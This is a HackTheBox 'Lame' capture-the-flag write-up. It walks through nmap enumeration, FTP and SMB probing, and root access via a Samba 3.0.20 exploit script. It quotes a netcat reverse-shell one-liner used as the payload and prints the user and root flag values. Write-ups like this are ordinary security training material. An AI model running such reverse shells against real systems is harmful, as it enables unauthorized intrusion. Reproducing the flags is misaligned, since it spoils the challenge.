Hackthebox – Lame – Writeup


What we know before interacting with the box:

  • Name: LAME
  • IP:
  • Level: Very easy
  • OS: Linux
  • Flag: 2 (User and Root Flag)
  • Common and real world vulnerability. Maybe related to previous Box.
  • Attacker IP:


First, give it an initial nmap enumeration

nmap -sV -A
21/tcp  open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
|   OS: Unix (Samba 3.0.20-Debian)
|   Domain name: hackthebox.gr
|   FQDN: lame.hackthebox.gr
|_  System time: 2021-08-26T13:12:53-04:00


– Domain: hackthebox.gr

– vsftpd 2.3.4running on port 21

– SSH 4.7p1 running on port 22

– And 139,445 ports serve SMB à This is not SMB service on Windows but on Linux. And the service used here is Samba smbd 3.0.20-Debian

Pentest FTP

As FTP supports anonymous login, I have a go at this FTP connection.

          (kali) ftp

Look like some filters prevent me from accessing data. Nothing’s here.

Search for exploit vsftpd 2.3.4  on google.

Tried a python script exploit for vsftpd but not work

Pentest SMB

I used smbmap to check for public share.

Well, we can READ,WRITE to tmp. I used smbclient to acess this folder but got error.

Search for this error message on google and I found one solution

Now smbclient works properly

Check for files on tmp folder, but got no useful information.

Exploit Samba 3.0.20

Search for exploit Samba version 3.0.20 on google and I found a python script macha97/exploit-smb-3.0.20 – GitHub

This script requires a payload created from msfvenom

This buf string actually is just a Bash reverse shell:

          (buf) mkfifo /tmp/cewoh; nc 4444 0</tmp/cewoh | /bin/sh >/tmp/cewoh 2>&1; rm /tmp/cewoh

The complete exploit script is like

Use python3 to run it

And I got shell from netcat listener

Greatly, my shell is already root. Go get user flag and root flag at once. There’s several users at /home

I find for .txt file for quickly get user flag.

(user flag) 83f38774483206d7c54299b9dd2e3a89

And the root flag is at /root/root.txt as usual

(root flag) 3bc8b537695679e5eb8cb0aeb9e2cb13

Lessons learned

  • SMB service (port 139,445 open) also exists on Linux.
  • Samba 3.0.20 is vulnerable to such a critical bug as it could lead to RCE as ROOT.






Related Post

Trả lời

Email của bạn sẽ không được hiển thị công khai. Các trường bắt buộc được đánh dấu *